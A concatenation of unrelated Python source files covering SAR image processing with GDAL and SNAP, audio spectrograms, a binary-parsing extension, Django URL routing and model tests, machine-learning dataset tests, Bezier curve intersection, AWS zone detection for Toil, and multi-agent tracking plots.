files = ['/i_VH.img','/q_VH.img','/i_VV.img','/q_VV.img']
# intial data array to store data in memory
fid = gdal.Open(path+files[0])
data = np.zeros((len(files),fid.RasterYSize,fid.RasterXSize),dtype = np.float32)
del fid
# read data
for i in range(0,len(files)):
fid = gdal.Open(path+files[i])
data[i,:,:] = fid.ReadAsArray()
del fid
# save the data into nlsartoolbox format
dn,rw,cl = data.shape
nlsardata = np.zeros((rw,cl,2,2),dtype=np.complex64)
nlsardata[:,:,0,0] = np.square(data[0,:,:])+np.square(data[1,:,:])
nlsardata[:,:,0,1] = (data[0,:,:]*data[2,:,:]+data[1,:,:]*data[3,:,:])+(data[1,:,:]*data[2,:,:]-data[0,:,:]*data[3,:,:])*1j
nlsardata[:,:,1,0] = np.conjugate(nlsardata[:,:,0,1])
nlsardata[:,:,1,1] = np.square(data[2,:,:])+np.square(data[3,:,:])
return nlsardata
def nlsarData2SEN1DimCovariance(nlsarData,path):
# this function write NLSAR data covariance matrix into a SEN1 DIM file, in its covariance matrix format
# path = '/datastore/DATA/classification/SEN1/LCZ42_SEN1/LCZ42_22606_Zurich/rangeAzimuth_nlm_dat/201706/S1B_IW_SLC__1SDV_20170602T053407_20170602T053434_005867_00A499_A351_Orb_Cal_Deb_Spk_Sub.data'
files = ['/C11.img','/C12_real.img','/C12_imag.img','/C22.img']
from osgeo.gdalconst import GA_Update
for i in range(0,len(files)):
fid = gdal.Open(path+files[i],GA_Update)
saveDat = fid.ReadAsArray()
bnd = fid.GetRasterBand(1)
if i == 0:
saveDat = np.real(nlsarData[:,:,0,0])
elif i == 1:
saveDat = np.real(nlsarData[:,:,0,1])
elif i == 2:
saveDat = np.imag(nlsarData[:,:,0,1])
elif i == 3:
saveDat = np.real(nlsarData[:,:,1,1])
bnd.WriteArray(saveDat)
bnd.FlushCache()
del bnd,fid
def terrainCorrection(dimPath, template, projection):
# this function accomplishes terrain correction using SNAP tool box, mainly for unfiltered data in higher resolution
try:
gptdir = os.environ['gpt']
except:
print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
print("ERROR: Directory to ESA SNAP TOOLBOX GPT not found in environment variables")
print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
return 0
# get the directory to the output file
outputData = dimPath.replace('_Sub.dim','_Sub_TC.tif')
outputData = outputData.replace('rangeAzimuth_dat','geocoded_unfilt_Hres_dat')
outputPath = '/'.join(outputData.split('/')[:-1])
if not os.path.exists(outputPath):
os.makedirs(outputPath)
# read and configure XML file
tree = et.parse(template)
root = tree.getroot()
for node in root.findall('node'):
if node[0].text == 'Read':
node[2][0].text = dimPath
elif node[0].text == 'Write':
node[2][0].text = outputData
elif node[0].text == 'Terrain-Correction' and projection != 0:
node[2][9].text = projection
# save the configuration
xmldir = outputPath + "/Preprocessing_TC.xml"
tree.write(xmldir)
# read and configure XML file
tree = et.parse(template)
root = tree.getroot()
for node in root.findall('node'):
if node[0].text == 'Read':
node[2][0].text = dimPath
elif node[0].text == 'Write':
node[2][0].text = outputData
elif node[0].text == 'Terrain-Correction' and projection != 0:
node[2][9].text = projection
# save the configuration
xmldir = outputPath + "/Preprocessing_TC.xml"
tree.write(xmldir)
print("#############################################################")
print("INFO: Terrain correction of the unfiltered data")
print("#############################################################")
subprocess.call([gptdir,xmldir])
def nlmTerrainCorrection(dimPath, template, projection):
# this function accomplishes terrain correction using SNAP tool box, mainly for nlm filtered data in higher resolution
try:
gptdir = os.environ['gpt']
except:
print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
print("ERROR: Directory to ESA SNAP TOOLBOX GPT not found in environment variables")
print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
return 0
# get the directory to the output file
outputData = dimPath.replace('_Sub.dim','_Sub_TC.tif')
outputData = outputData.replace('rangeAzimuth_nlm_dat','geocoded_Hres_dat')
outputPath = '/'.join(outputData.split('/')[:-1])
if not os.path.exists(outputPath):
os.makedirs(outputPath)
# read and configure XML file
tree = et.parse(template)
root = tree.getroot()
for node in root.findall('node'):
if node[0].text == 'Read':
node[2][0].text = dimPath
elif node[0].text == 'Write':
node[2][0].text = outputData
elif node[0].text == 'Terrain-Correction' and projection != 0:
node[2][9].text = projection
# save the configuration
xmldir = outputPath + "/Preprocessing_TC.xml"
tree.write(xmldir)
print("#############################################################")
print("INFO: Terrain correction of the nlm filtered data")
print("#############################################################")
subprocess.call([gptdir,xmldir])
|
import librosa as lc
import matplotlib.pyplot as plt
import numpy as np
fs = 16000
n_fft = 512
f = fs*np.array(range(int(1+n_fft/2)))/(n_fft/2)
def stft(path):
# Load a file
data = lc.load(path,sr=None)
length = len(data[0])
spec = np.array(lc.stft(data[0], n_fft=512, hop_length=160, win_length=400, window='hann'))
plt.pcolormesh(np.array(range(int(length/160+1)))/fs, f, np.abs(spec))
plt.colorbar()
plt.title('STFT Magnitude')
plt.ylabel('Frequency [Hz]')
plt.xlabel('Time [sec]')
plt.tight_layout()
plt.show()
stft('vavle.00.normal.00000023.wav') |
"""
binalyzer_core.extension
~~~~~~~~~~~~~~~~~~~~~~~~
This module supports the creation of Binalyzer extensions.
"""
from binalyzer_core import (
BinalyzerExtension,
TemplateFactory,
ValueProviderBase,
value_cache,
)
class UtilityExtension(BinalyzerExtension):
def __init__(self, binalyzer=None):
super(UtilityExtension, self).__init__(binalyzer, "utils")
def init_extension(self):
super(UtilityExtension, self).init_extension()
def count(self, property):
return CountValueProvider(property)
class CountValueProvider(ValueProviderBase):
def __init__(self, property):
super(CountValueProvider, self).__init__(property)
@value_cache
def get_value(self):
template = TemplateFactory().clone(self.property.template)
template.binding_context = self.property.template.binding_context
total_data_size = self.property.template.binding_context.data.seek(0, 2)
packet_record_address = self.property.template.absolute_address
packet_record_count = 0
while True:
if packet_record_address >= total_data_size:
break
template.offset = packet_record_address
packet_record_address = template.absolute_address + template.size
packet_record_count += 1
return packet_record_count
def set_value(self, value):
raise RuntimeError("Not implemented, yet.")
|
from django.urls import path
from . import views
urlpatterns = [
path("", views.index, name="index"),
path("login", views.login_view, name="login"),
path("logout", views.logout_view, name="logout"),
path("register", views.register, name="register"),
path("createlisting", views.createListing, name="createListing"),
path("categories", views.categories, name="categories"),
path("categories/<str:category>", views.category, name="category"),
path("listings/<int:listingId>", views.listing, name="listing"),
path("listings/<int:listingId>/bid", views.bid, name="bid"),
path("listings/<int:listingId>/closelisting", views.closeListing, name="closelisting"),
path("listings/<int:listingId>/comment", views.comment, name="comment"),
path("listings/<int:listingId>/deletecomment", views.deletecomment, name="deletecomment"),
path("users/<str:username>/listings", views.userListings, name="userlistings"),
path("users/<str:username>/mylistings", views.userListings, name="mylistings"),
path("users/<str:username>/watchlist", views.watchlist, name="watchlist"),
path("users/<str:username>/watchlist/alterwatchlist", views.alterWatchlist, name="alterWatchlist")
]
|
from pathlib import Path
from unittest.mock import patch
import pytest
from zenithml.data import BQDataset
from zenithml.data import ParquetDataset
from zenithml.preprocess import Numerical, StandardNormalizer
from zenithml.preprocess import Preprocessor
def test_parquet_dataset(test_df, datasets, tmp_path):
test_df_path = str(datasets["dummy_df"])
transformed_data_loc = str(Path(test_df_path) / "transformed_dataset")
ds = ParquetDataset(
data_loc=test_df_path,
working_dir=tmp_path,
transformed_data_loc=transformed_data_loc,
)
assert ds.base_nvt_dataset.num_rows == len(test_df)
assert isinstance(ds.preprocessor, Preprocessor)
assert str(ds.transformed_data_loc) == transformed_data_loc
def test_parquet_dataset_variables(datasets, tmp_path):
test_df_path = str(datasets["dummy_df"])
ds = ParquetDataset(test_df_path, tmp_path)
ds.add_outcome_variable("y")
ds.add_variable_group("features", [Numerical("dummy_col")])
assert ds.preprocessor.outcome_variable == "y"
assert ds.preprocessor.variable_group_keys == ["features"]
@pytest.mark.parametrize("transform", [Numerical, StandardNormalizer])
def test_parquet_dataset_analyze(transform, test_df, datasets, tmp_path):
test_df_path = str(datasets["dummy_df"])
preprocessor_loc = str(Path(tmp_path) / "preprocessor")
ds = ParquetDataset(test_df_path, tmp_path)
ds.add_outcome_variable("y")
ds.add_variable_group("features", [transform("f_ints")])
ds.analyze(pandas_df=test_df, preprocessor_loc=preprocessor_loc)
load_preprocessor = Preprocessor()
load_preprocessor.load(preprocessor_loc)
assert load_preprocessor.outcome_variable == "y"
assert load_preprocessor.variable_group_keys == ["features"]
if transform == Numerical:
assert load_preprocessor.analysis_data == {"features": {}}
elif transform == StandardNormalizer:
for k in ["avg", "max", "min", "stddev"]:
assert f"features_f_ints_{k}" in load_preprocessor.analysis_data["features"]
def test_parquet_dataset_to_tf(test_df, datasets, tmp_path):
test_df_path = str(datasets["dummy_df"])
preprocessor_loc = str(Path(tmp_path) / "preprocessor")
transformed_data_loc = str(Path(tmp_path) / "transformed_data")
ds = ParquetDataset(test_df_path, tmp_path, transformed_data_loc=transformed_data_loc)
ds.add_outcome_variable("y")
ds.add_variable_group("features", [Numerical("f_ints")])
ds.analyze_transform(preprocessor_loc=preprocessor_loc, pandas_df=test_df, out_files_per_proc=1)
batch = next(ds.to_tf(batch_size=2))
assert list(batch[0]) == ["f_ints"]
assert len(batch[0]["f_ints"]) == 2
assert len(batch[1]) == 2
def test_parquet_dataset_to_torch(test_df, datasets, tmp_path):
test_df_path = str(datasets["dummy_df"])
preprocessor_loc = str(Path(tmp_path) / "preprocessor")
transformed_data_loc = str(Path(tmp_path) / "transformed_data")
ds = ParquetDataset(test_df_path, tmp_path, transformed_data_loc=transformed_data_loc)
ds.add_outcome_variable("y")
ds.add_variable_group("features", [Numerical("f_ints")])
ds.analyze_transform(preprocessor_loc=preprocessor_loc, pandas_df=test_df, out_files_per_proc=1)
batch = next(iter(ds.to_torch(batch_size=2)))
assert list(batch[0]) == ["f_ints"]
assert len(batch[0]["f_ints"]) == 2
assert len(batch[1]) == 2
@patch("zenithml.data.core.BQRunner")
def test_bq_dataset(mock_bq_runner, datasets, tmp_path):
test_df_path = str(datasets["dummy_df"])
mock_bq_runner().to_parquet.return_value = test_df_path
ds = BQDataset(bq_table="project.dataset.table", gcs_datasets_dir="gs://dummy", working_dir=tmp_path)
assert ds.base_nvt_dataset.num_rows == 5
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import de_casteljau
import eft
def standard_residual(s, coeffs1, t, coeffs2):
x1 = de_casteljau.basic(s, coeffs1[0, :])
y1 = de_casteljau.basic(s, coeffs1[1, :])
x2 = de_casteljau.basic(t, coeffs2[0, :])
y2 = de_casteljau.basic(t, coeffs2[1, :])
return np.array([[x1 - x2], [y1 - y2]])
def compensated_residual(s, coeffs1, t, coeffs2):
x1, dx1 = de_casteljau._compensated_k(s, coeffs1[0, :], 2)
y1, dy1 = de_casteljau._compensated_k(s, coeffs1[1, :], 2)
x2, dx2 = de_casteljau._compensated_k(t, coeffs2[0, :], 2)
y2, dy2 = de_casteljau._compensated_k(t, coeffs2[1, :], 2)
dx, sigma = eft.add_eft(x1, -x2)
tau = (dx1 - dx2) + sigma
dx += tau
dy, sigma = eft.add_eft(y1, -y2)
tau = (dy1 - dy2) + sigma
dy += tau
return np.array([[dx], [dy]])
def newton(s0, coeffs1, t0, coeffs2, residual):
max_iter = 50
tol = 1e-15
s = s0
t = t0
iterates = []
for _ in range(max_iter):
F = residual(s, coeffs1, t, coeffs2)
# Compute the standard Jacobian.
dx1 = de_casteljau.derivative(s, coeffs1[0, :])
dy1 = de_casteljau.derivative(s, coeffs1[1, :])
dx2 = de_casteljau.derivative(t, coeffs2[0, :])
dy2 = de_casteljau.derivative(t, coeffs2[1, :])
J = np.array([[dx1, -dx2], [dy1, -dy2]])
# Solve for the updates.
ds, dt = np.linalg.solve(J, F).flatten()
# Apply the updates.
s = s - ds
t = t - dt
iterates.append((s, t))
# Return if the update is below the tolerance.
if np.linalg.norm([ds, dt], ord=2) < tol: # 2-norm
break
return iterates
|
import os
def processFiles(dirPath, dstFilePath):
new_f = open(dstFilePath, 'w')
for file in os.listdir(dirPath):
file_path = os.path.join(dirPath, file)
f = open(file_path, 'r')
line = f.readline()
while (line):
new_f.write(line)
line = f.readline()
if __name__ == '__main__':
processFiles('C:\\Users\\shankai\\Desktop\\result','data/sendBiaoqingWithPrefetchNoOrigin.txt') |
from django.test import TestCase, tag
from smart_meter.models import GroupParticipant
from smart_meter.tests.mixin import MeterTestMixin
@tag('model')
class TestGroupParticipantModel(MeterTestMixin, TestCase):
@classmethod
def setUpTestData(cls):
super().setUpTestData()
cls.user = cls.create_user()
cls.some_group = cls.create_group_meter()
def setUp(self):
self.meter = self.create_smart_meter(self.user)
@tag('model')
def test_group_participant_save_success(self):
# given
participant = GroupParticipant(meter=self.meter, group=self.some_group, )
# when
participant.save()
# then
# Should be active
self.assertTrue(participant.active)
# Should have copied over the initial meter values
self.assertEqual(self.meter.name, participant.display_name)
self.assertEqual(self.meter.power_import, participant.power_import_joined)
self.assertEqual(self.meter.power_export, participant.power_export_joined)
self.assertEqual(self.meter.total_gas, participant.gas_joined)
@tag('model')
def test_group_participant_total_properties_active_success(self):
# given
participant = self.create_group_participation(self.meter, self.some_group)
self.meter.total_power_import_1 += 1
self.meter.total_power_import_2 += 1
self.meter.total_power_export_1 += 1
self.meter.total_power_export_2 += 1
self.meter.total_gas += 1
self.meter.save()
# when
participant.refresh_from_db()
# then
self.assertEqual(2, participant.total_import)
self.assertEqual(2, participant.total_export)
self.assertEqual(1, participant.total_gas)
@tag('model')
def test_group_participant_total_properties_inactive_success(self):
# given
participant = self.create_group_participation(self.meter, self.some_group)
self.meter.total_power_import_1 += 1
self.meter.total_power_import_2 += 1
self.meter.total_power_export_1 += 1
self.meter.total_power_export_2 += 1
self.meter.total_gas += 1
self.meter.save()
# when
participant.refresh_from_db()
participant.leave()
participant.save()
# then
participant.refresh_from_db()
self.assertEqual(2, participant.total_import)
self.assertEqual(2, participant.total_export)
self.assertEqual(1, participant.total_gas)
@tag('model')
def test_group_participant_actual_properties_active_success(self):
# given
participant = self.create_group_participation(self.meter, self.some_group)
self.meter.actual_power_import = 2
self.meter.actual_power_export = 0
self.meter.actual_gas = 3
self.meter.actual_solar = 4
self.meter.save()
# when
participant.refresh_from_db()
# then
# actual power = export - import
self.assertEqual(-2, participant.actual_power)
self.assertEqual(3, participant.actual_gas)
self.assertEqual(4, participant.actual_solar)
@tag('model')
def test_group_participant_actual_properties_inactive_success(self):
# given
participant = self.create_group_participation(self.meter, self.some_group)
self.meter.actual_power_import = 2
self.meter.actual_power_export = 0
self.meter.actual_gas = 3
self.meter.actual_solar = 4
self.meter.save()
# when
participant.refresh_from_db()
participant.leave()
participant.save()
# then
self.assertEqual(0, participant.actual_power)
self.assertEqual(0, participant.actual_gas)
self.assertEqual(None, participant.actual_solar)
@tag('model')
def test_group_participant_leave_success(self):
# given
participant = self.create_group_participation(self.meter, self.some_group)
# when
participant.leave()
participant.save()
# then
self.assertFalse(participant.active)
self.assertIsNotNone(participant.left_on)
@tag('manager')
def test_group_participant_manager_active_success(self):
# given
participant1 = self.some_group.participants.first() # 1st participant already created in setup
participant2 = self.create_group_participation(self.meter, self.some_group)
participant3 = self.create_group_participation(self.meter, self.some_group)
inactive_participant3 = self.create_group_participation(self.meter, self.some_group)
inactive_participant3.leave()
inactive_participant3.save()
# when
participants = GroupParticipant.objects.active()
# then
self.assertEqual(3, participants.count())
for p in participants:
self.assertIn(p.pk, [participant1.pk, participant2.pk, participant3.pk])
|
import numpy as np
from typing import Tuple, Iterable, Generator
# A little bit of sugar for type hints
Array = np.ndarray
def all_equals(iterable: Iterable) -> bool:
"""Return `True` if all elements of a given `iterable` are equals,
otherwise return `False`.
"""
return len(set(iterable)) <= 1
def enumerate_arrays(*arrays: Tuple[Array]) -> Generator:
"""Same as NumPy's `ndenumerate` function, except it allows enumerating
multiple `ndarray`s.
"""
assert all_equals(a.shape for a in arrays), "Array shape mismatch"
for indexes in np.ndindex(arrays[0].shape):
yield indexes, (a[indexes] for a in arrays)
|
# Copyright (C) 2015-2021 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import inspect
import logging
import os
import re
import socket
import threading
from functools import lru_cache
from urllib.request import urlopen
from urllib.error import URLError
from typing import Any, Callable, Dict, Iterable, List, Optional, TypeVar, Union
logger = logging.getLogger(__name__)
# This file isn't allowed to import anything that depends on Boto or Boto3,
# which may not be installed, because it has to be importable everywhere.
def get_current_aws_region() -> Optional[str]:
"""
Return the AWS region that the currently configured AWS zone (see
get_current_aws_zone()) is in.
"""
aws_zone = get_current_aws_zone()
return zone_to_region(aws_zone) if aws_zone else None
def get_aws_zone_from_environment() -> Optional[str]:
"""
Get the AWS zone from TOIL_AWS_ZONE if set.
"""
return os.environ.get('TOIL_AWS_ZONE', None)
def get_aws_zone_from_metadata() -> Optional[str]:
"""
Get the AWS zone from instance metadata, if on EC2 and the boto module is
available.
"""
if running_on_ec2():
try:
import boto
from boto.utils import get_instance_metadata
return get_instance_metadata()['placement']['availability-zone']
except (KeyError, ImportError):
pass
return None
def get_aws_zone_from_boto() -> Optional[str]:
"""
Get the AWS zone from the Boto config file, if it is configured and the
boto module is avbailable.
"""
try:
import boto
zone = boto.config.get('Boto', 'ec2_region_name')
if zone is not None:
zone += 'a' # derive an availability zone in the region
return zone
except ImportError:
pass
return None
def get_current_aws_zone() -> Optional[str]:
"""
Get the currently configured or occupied AWS zone to use.
Reports the TOIL_AWS_ZONE environment variable if set.
Otherwise, if we have boto and are running on EC2, reports the zone we are
running in.
Finally, if we have boto2, and a default region is configured in Boto 2,
chooses a zone in that region.
Returns None if no method can produce a zone to use.
"""
return get_aws_zone_from_environment() or \
get_aws_zone_from_metadata() or \
get_aws_zone_from_boto()
def zone_to_region(zone: str) -> str:
"""Get a region (e.g. us-west-2) from a zone (e.g. us-west-1c)."""
# re.compile() caches the regex internally so we don't have to
availability_zone = re.compile(r'^([a-z]{2}-[a-z]+-[1-9][0-9]*)([a-z])$')
m = availability_zone.match(zone)
if not m:
raise ValueError(f"Can't extract region from availability zone '{zone}'")
return m.group(1)
def running_on_ec2() -> bool:
"""
Return True if we are currently running on EC2, and false otherwise.
"""
# TODO: Move this to toil.lib.ec2 and make toil.lib.ec2 importable without boto?
def file_begins_with(path, prefix):
with open(path) as f:
return f.read(len(prefix)) == prefix
hv_uuid_path = '/sys/hypervisor/uuid'
if os.path.exists(hv_uuid_path) and file_begins_with(hv_uuid_path, 'ec2'):
return True
# Some instances do not have the /sys/hypervisor/uuid file, so check the identity document instead.
# See https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
try:
urlopen('http://169.254.169.254/latest/dynamic/instance-identity/document', timeout=1)
return True
except (URLError, socket.timeout):
return False
|
def checkAll(s, str, res, v):
new_str = str
for c in s:
temp = new_str.replace(c, "", 1)
if len(new_str) is len(temp):
return str
new_str = temp
res.append(v)
return new_str
def check(s):
l = ["ZERO", "ONE", "TWO", "THREE", "FOUR", "FIVE", "SIX", "SEVEN", "EIGHT", "NINE"]
res = []
i = 0
while i < len(l):
num = l[i]
temp = checkAll(num, s, res, i)
if len(temp) is len(s):
i += 1
s = temp
return ''.join(map(str, res))
def main():
t = int(raw_input())
for i in range(1, t + 1):
print "Case #%d: %s" % (i, check(raw_input()))
if __name__ == '__main__':
main()
|
from src.multi_agent.agent.agent_interacting_room_camera import AgentCam
from src.my_utils.my_IO.IO_data import *
from src.my_utils.my_math.MSE import error_squared_list, error_squared_x_y_list
from src.plot_functions.plot_toolbox import plot_graph_x_y
from src.my_utils.my_math.MSE import *
from src.plot_functions.plot_toolbox import *
import matplotlib.pyplot as plt
TIME_TO_COMPARE = 0
TIME_INDEX = 1
AGENT_INDEX = 2
TYPE_INDEX = 6
X_INDEX = 7
Y_INDEX = 8
VX_INDEX = 9
VY_INDEX = 10
AX_INDEX = 11
AY_INDEX = 12
RADIUS_INDEX = 13
def plot_target_memory_type_x_y_2D(ax, data, curve_label="Title Here"):
return plot_graph_3D_2D(ax, data[X_INDEX], data[Y_INDEX], data[TYPE_INDEX], data[RADIUS_INDEX], 0, 3,
"Trajectory x-y plane (type in color)", "x [m]", "y [m]",
curve_label=curve_label)
def plot_target_memory_time_x_y_2D(ax, data, curve_label="curve_label"):
return plot_graph_3D_2D(ax, data[X_INDEX], data[Y_INDEX], data[TIME_INDEX], data[RADIUS_INDEX], T_MIN, T_MAX,
"Trajectory x-y plane (time [s] in color)", "x [m]", "y [m]",
curve_label=curve_label)
def plot_target_memory_agent_x_y_2D(ax, data, curve_label="curve_label"):
return plot_graph_3D_2D(ax, data[X_INDEX], data[Y_INDEX], data[AGENT_INDEX], data[RADIUS_INDEX], 0,
AgentCam.number_agentCam_created - 1, "Trajectory x-y plane (agent id in color)",
"x [m]", "y [m]", curve_label=curve_label)
def plot_target_memory_agent_vx_vy_2D(ax, data, curve_label="curve_label"):
return plot_graph_3D_2D(ax, data[VX_INDEX], data[VY_INDEX], data[AGENT_INDEX], data[RADIUS_INDEX], 0,
AgentCam.number_agentCam_created - 1, "x-y plane agent",
"vx [m/s]", "vy [m/s]", curve_label=curve_label)
def plot_target_memory_agent_ax_ay_2D(ax, data, curve_label="curve_label"):
return plot_graph_3D_2D(ax, data[AX_INDEX], data[AY_INDEX], data[AGENT_INDEX], data[RADIUS_INDEX], 0, 2,
"x-y plane agent",
"ax [m/s^2]", "ay [m/s^2]", curve_label=curve_label)
def plot_target_memory_x_y(ax, data, curve_label="curve_label"):
plot_graph_x_y(ax, data[X_INDEX], data[Y_INDEX], "Trajectory x-y plane (time [s] in color)", "x [m]", "y [m]",
curve_label=curve_label)
def plot_target_memory_time_x(ax, data, curve_label="curve_label"):
plot_graph_time_x(ax, data[TIME_INDEX], data[X_INDEX], "X in terms of time", "time [s]", "x [m]",
curve_label=curve_label)
def plot_target_memory_time_y(ax, data, curve_label="curve_label"):
plot_graph_time_x(ax, data[TIME_INDEX], data[Y_INDEX], "Y in terms of time", "time [s]", "y [m]",
curve_label=curve_label)
def plot_target_memory_time_agent(ax, data, curve_label="curve_label"):
plot_graph_time_x(ax, data[TIME_INDEX], data[AGENT_INDEX], "Agent generating info in terms of time", "time [s]",
"Agent [id]",
curve_label=curve_label)
def plot_target_memory_type_x_y_3D(ax, data):
plot_graph_3D(ax, data[X_INDEX], data[Y_INDEX], data[TIME_INDEX], "x-y plane, type", "x [m]", "y [m]")
def plot_target_memory_time_x_y_3D(ax, data):
plot_graph_3D(ax, data[X_INDEX], data[Y_INDEX], data[TIME_INDEX], "x-y plane, time", "x [m]", "y [m]")
def plot_time_type_x_y_agent(list):
fig_time_type_x_y = plt.figure()
ax1 = fig_time_type_x_y.add_subplot(2, 2, 1)
ax2 = fig_time_type_x_y.add_subplot(2, 2, 2)
ax3 = fig_time_type_x_y.add_subplot(2, 2, 3)
ax4 = fig_time_type_x_y.add_subplot(2, 2, 4)
for element in list:
plot_target_memory_time_x_y_2D(ax1, element.data_list)
plot_target_memory_type_x_y_2D(ax2, element.data_list)
plot_target_memory_agent_x_y_2D(ax3, element.data_list)
plot_target_memory_time_agent(ax4, element.data_list)
def plot_time_type_x_y(list):
fig_time_type_x_y = plt.figure()
ax1 = fig_time_type_x_y.add_subplot(1, 2, 1)
ax2 = fig_time_type_x_y.add_subplot(1, 2, 2)
for element in list:
plot_target_memory_time_x_y_2D(ax1, element.data_list)
plot_target_memory_type_x_y_2D(ax2, element.data_list)
def plot_time_x_y(list):
fig_time_x_y_3D = plt.figure()
fig_time_x_y_2D = plt.figure()
fig_time_x_y = plt.figure()
ax1 = fig_time_x_y.add_subplot(1, 2, 1, projection='3d')
ax2 = fig_time_x_y.add_subplot(1, 2, 2)
for element in list:
plot_target_memory_time_x_y_2D(fig_time_x_y_2D.gca(), element.data_list)
plot_target_memory_time_x_y_3D(fig_time_x_y_3D.gca(projection='3d'), element.data_list)
plot_target_memory_time_x_y_2D(ax2, element.data_list)
plot_target_memory_time_x_y_3D(ax1, element.data_list)
def init_analyse_memory_agent(list_init, list_sort):
for data_element in list_init:
is_in_list = False
for element in list_sort:
if int(data_element['target_id']) == element.target_id:
# element.add_itemEstimator(data_element)
element.add_target_estimator(data_element)
is_in_list = True
break
if not is_in_list:
"Create a new TargetSortedTargetEstimator"
target_created = TargetSortedTargetEstimator(data_element['target_id'],
data_element['target_signature'])
"Add Data"
target_created.add_target_estimator(data_element)
list_sort.append(target_created)
list_sort.sort()
def init_analyse_memory_all_agent(list_init, list_sort):
for data_element in list_init:
is_in_list_agent = False
is_in_list_target = False
for agent_element in list_sort:
if agent_element.agent_id == int(data_element['agent_id']):
is_in_list_agent = True
for target_element in agent_element.data_list:
if target_element.target_id == int(data_element['target_id']):
is_in_list_target = True
"Add Data"
# target_element.add_itemEstimator(data_element)
target_element.add_target_estimator(data_element)
break
if not is_in_list_target:
"Create a new TargetSortedTargetEstimator"
target_created = TargetSortedTargetEstimator(data_element['target_id'],
data_element['target_signature'])
"Add Data"
target_created.add_target_estimator(data_element)
agent_element.data_list.append(target_created)
break
if not is_in_list_agent:
"Create a new AgentSortedTargetEstimator"
agent_created = AgentSortedTargetEstimator(data_element['agent_id'], data_element['agent_signature'])
"Create a new TargetSortedTargetEstimator"
target_created = TargetSortedTargetEstimator(data_element['target_id'], data_element['target_signature'])
"Add the new data"
target_created.add_target_estimator(data_element)
agent_created.data_list.append(target_created)
list_sort.append(agent_created)
list_sort.sort()
for elem in list_sort:
elem.data_list.sort()
class TargetSortedTargetEstimator:
def __init__(self, target_id, target_signature):
self.target_id = int(target_id)
self.target_signature = int(target_signature)
self.data_list = []
self.init()
def init(self):
for i in range(len(constants.TARGET_ESTIMATOR_CSV_FIELDNAMES)):
self.data_list.append([])
def add_target_estimator(self, data):
for i in range(len(constants.TARGET_ESTIMATOR_CSV_FIELDNAMES)):
try:
self.data_list[i].append(float(data[constants.TARGET_ESTIMATOR_CSV_FIELDNAMES[i]]))
except ValueError:
print("problème pas grave mais c'est bien que ça print pour pas oublier")
self.data_list[i].append(data[constants.TARGET_ESTIMATOR_CSV_FIELDNAMES[i]])
def __eq__(self, other):
return self.target_id == other.target_id
def __lt__(self, other):
return self.target_id < other.target_id
def __gt__(self, other):
return self.target_id > other.target_id
class AgentSortedTargetEstimator:
def __init__(self, agent_id, agent_signature):
self.agent_id = int(agent_id)
self.agent_signature = int(agent_signature)
self.data_list = []
def __eq__(self, other):
return self.agent_id == other.agent_id
def __lt__(self, other):
return self.agent_id < other.agent_id
def __gt__(self, other):
return self.agent_id > other.agent_id
class Analyser_Target_TargetEstimator_FormatCSV:
def __init__(self, agent_id, path_to_load_data, path_to_save_data, version="version"):
self.id = agent_id
self.version = version
self.path_to_save_data = path_to_save_data
self.data = load_csv_file_dictionnary(path_to_load_data + str(agent_id))
self.simulated_data = load_csv_file_dictionnary(constants.ResultsPath.SAVE_LOAD_DATA_REFERENCE)
self.data_sort_by_target = []
self.simulated_data_sort_by_target = []
init_analyse_memory_agent(self.data, self.data_sort_by_target)
init_analyse_memory_agent(self.simulated_data, self.simulated_data_sort_by_target)
def get_MSE(self, target_id):
data_ref = []
data_mes = []
for element in self.simulated_data_sort_by_target:
if target_id == int(element.target_id):
data_ref = element.data_list
for element in self.data_sort_by_target:
if target_id == int(element.target_id):
data_mes = element.data_list
(t_ref, x_ref, y_ref, x_mes, y_mes, error_squared_x, error_squared_y,
error_squared) = error_squared_discrete(
data_ref, data_mes, True)
return np.sqrt(np.mean(error_squared))
def plot_rapport(self, target_id):
fig1 = plt.figure(figsize=(20, 8))
ax1 = fig1.add_subplot(1, 2, 1)
ax2 = fig1.add_subplot(1, 2, 2)
fig2 = plt.figure(figsize=(12, 8))
ax3 = fig2.add_subplot(1, 1, 1)
ax1.xaxis.set_tick_params(labelsize=20)
ax1.yaxis.set_tick_params(labelsize=20)
ax2.xaxis.set_tick_params(labelsize=20)
ax2.yaxis.set_tick_params(labelsize=20)
ax3.xaxis.set_tick_params(labelsize=20)
ax3.yaxis.set_tick_params(labelsize=20)
for element in self.simulated_data_sort_by_target:
sc1 = plot_target_memory_time_x_y_2D(ax1, element.data_list,
curve_label="target" + str(element.target_id) + " - ref")
plot_target_memory_x_y(ax1, element.data_list, curve_label="target" + str(element.target_id) + " - ref")
for element in self.data_sort_by_target:
plot_target_memory_x_y(ax1, element.data_list, curve_label="target" + str(element.target_id) + " - mes",
symb="*", color="gold")
sc2 = plot_target_memory_agent_x_y_2D(ax2, element.data_list,
curve_label="target" + str(element.target_id) + " - mes")
plot_target_memory_x_y(ax2, element.data_list, curve_label="target" + str(element.target_id) + " - mes",
symb="*", color="gold")
plot_target_memory_time_agent(ax3, element.data_list,
curve_label="target" + str(element.target_id) + " - mes")
cb = fig1.colorbar(sc1, ax=ax1)
cb.ax.yaxis.set_tick_params(labelsize=20)
